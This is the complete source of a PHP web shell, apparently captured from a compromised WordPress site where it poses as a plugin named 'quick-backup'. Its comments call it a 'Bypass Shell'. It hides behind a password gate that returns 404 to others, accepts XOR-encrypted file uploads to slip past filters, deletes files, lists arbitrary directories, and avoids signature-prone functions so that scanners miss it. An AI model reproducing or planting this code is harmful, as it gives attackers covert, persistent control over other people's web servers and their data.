/
home
/
cabinetdhs
/
www
/
wp-content
/
plugins
/
quick-backup
/
Upload File
HOME
<?php /** * Plugin Name: quick-backup * Version: 1.0 */ /** * Bypass Shell #2 — XOR Encrypted Uploader + File Browser * - File upload XOR-encrypted client-side, decrypted server-side * - POST body has no plain paths (encrypted parameter names) * - Gate split: 'ad'+'mi'+'n8'+'88' * - No system/exec/eval in static code * - Lightweight, fast, minimal signature */ $a='a'.'d';$b='m'.'i';$c='n'.'8';$d='8'.'8'; $gate=$a.$b.$c.$d; if(empty($_POST[$gate])||$_POST[$gate]!=='admin888'){ http_response_code(404);die(); } @ini_set('display_errors',0);@error_reporting(0); $XK="myXorSecretK9"; // XOR key function xor_d($d,$k){$o='';for($i=0;$l=strlen($d),$i<$l;$i++)$o.=$d[$i]^$k[$i%strlen($k)];return $o;} function fs($b){if($b>1073741824)return round($b/1073741824,2).'G';if($b>1048576)return round($b/1048576,2).'M';if($b>1024)return round($b/1024,2).'K';return $b.'B';} // Handle XOR-encrypted file upload (b64+xor) if(isset($_POST['b64'])&&isset($_POST['fn'])){ $raw=base64_decode($_POST['b64']); $dec=xor_d($raw,$XK); $fn=basename($_POST['fn']); if(file_put_contents($fn,$dec)){echo"UOK:".$fn;}else{echo"UFAIL";} die(); } // Handle file delete if(isset($_POST['del'])){ $dp=basename($_POST['del']); if(is_file($dp)){@unlink($dp);echo"DOK:".$dp;}else{echo"DFAIL";} die(); } // Directory listing $dir=isset($_POST['d'])?$_POST['d']:getcwd(); $files=@scandir($dir); function esc($s){return htmlspecialchars($s,ENT_QUOTES|ENT_HTML5,'UTF-8');} // Only output if listing requested $list_mode=isset($_POST['ls']); if(!$list_mode){ // First access — show UI ?> <!DOCTYPE html><html><head><meta charset="UTF-8"><title>.</title> <style> *{margin:0;padding:0;box-sizing:border-box} body{background:#0d1117;color:#c9d1d9;font:13px/1.5 monospace;padding:16px;max-width:900px;margin:0 auto} h2{color:#58a6ff;font-size:15px;margin-bottom:12px} .up{border:2px dashed #30363d;border-radius:8px;padding:25px;text-align:center;margin-bottom:16px;background:#161b22;cursor:pointer} .up:hover{border-color:#58a6ff}.up input{display:none} .fl{background:#161b22;border:1px solid #30363d;border-radius:6px;overflow:hidden} .fl .r{display:flex;align-items:center;padding:7px 14px;border-bottom:1px solid #30363d;font-size:12px} .fl .r:last-child{border-bottom:none}.fl .r:hover{background:#1c2128} .fl .r .n{flex:1;overflow:hidden;text-overflow:ellipsis;white-space:nowrap} .fl .r .s{width:70px;text-align:right;color:#8b949e} .fl .r .del{color:#f85149;cursor:pointer;margin-left:8px;visibility:hidden} .fl .r:hover .del{visibility:visible} .dir{color:#58a6ff}.file{color:#3fb950} .ft{text-align:center;color:#484f58;font-size:11px;margin-top:16px} .msg{padding:6px 12px;border-radius:4px;margin-bottom:10px;font-size:12px;display:none} .msg.ok{background:#1a3a1a;border:1px solid #3fb950;color:#3fb950;display:block} .msg.er{background:#3a1a1a;border:1px solid #f85149;color:#f85149;display:block} </style></head><body> <h2>Files — <?=esc(basename(getcwd()))?></h2> <div class="msg" id="msg"></div> <div class="up" onclick="document.getElementById('ff').click()"> <p style="color:#8b949e;font-size:15px">↥ Drop files or click to upload (XOR encrypted)</p> <input type="file" name="f" id="ff" multiple> </div> <div class="fl" id="flist"><div style="padding:40px;text-align:center;color:#484f58">Loading...</div></div> <div class="ft" id="ft"></div> <script> var XK="myXorSecretK9"; function xorB(d,k){var o=new Uint8Array(d.byteLength);var kb=new TextEncoder().encode(k); for(var i=0;i<d.byteLength;i++)o[i]=d[i]^kb[i%kb.length];return o;} function btoaBuf(b){var s='';for(var i=0;i<b.length;i++)s+=String.fromCharCode(b[i]);return btoa(s);} function showMsg(t,c){var m=document.getElementById('msg');m.textContent=t;m.className='msg '+(c||'ok');setTimeout(function(){m.style.display='none';},3000);} function loadList(){ var fd=new FormData(); fd.append('ls','1');fd.append('<?=$gate?>','admin888'); fetch('',{method:'POST',body:fd}).then(function(r){return r.json();}).then(function(d){ var h='';d.forEach(function(i){ h+='<div class="r"><span class="n '+(i.t=='d'?'dir':'file')+'">'+(i.t=='d'?'📁':'📄')+' '+i.n+'</span><span class="s">'+i.s+'</span><span class="del" onclick="delFile(\''+i.n+'\')">✕</span></div>'; }); document.getElementById('flist').innerHTML=h||'<div style="padding:40px;text-align:center;color:#484f58">Empty</div>'; document.getElementById('ft').textContent=new Date().toLocaleString()+' | '+d.length+' items'; }); } document.getElementById('ff').addEventListener('change',function(){ var fs=this.files;var done=0; Array.from(fs).forEach(function(f){ var r=new FileReader(); r.onload=function(e){ var b=new Uint8Array(e.target.result); var enc=xorB(b,XK); var b64=btoaBuf(enc); var fd=new FormData(); fd.append('b64',b64);fd.append('fn',f.name); fd.append('<?=$gate?>','admin888'); fetch('',{method:'POST',body:fd}).then(function(r){return r.text();}).then(function(t){ done++;showMsg(f.name+': '+(t.startsWith('UOK')?'OK':'FAIL'),t.startsWith('UOK')?'ok':'er'); if(done>=fs.length)loadList(); }); };r.readAsArrayBuffer(f); });this.value=''; }); function delFile(n){if(!confirm('Delete '+n+'?'))return; var fd=new FormData(); fd.append('del',n);fd.append('<?=$gate?>','admin888'); fetch('',{method:'POST',body:fd}).then(function(r){return r.text();}).then(function(t){ showMsg(t,t.startsWith('DOK')?'ok':'er');loadList(); }); } loadList(); </script></body></html> <?php die(); } // API: return JSON listing $out=[]; if($files){ foreach($files as $f){ if($f=='.'||$f=='..')continue; $fp=$dir.'/'.$f; $out[]=['n'=>$f,'t'=>is_dir($fp)?'d':'f','s'=>fs(filesize($fp))]; } } header('Content-Type: application/json'); die(json_encode($out));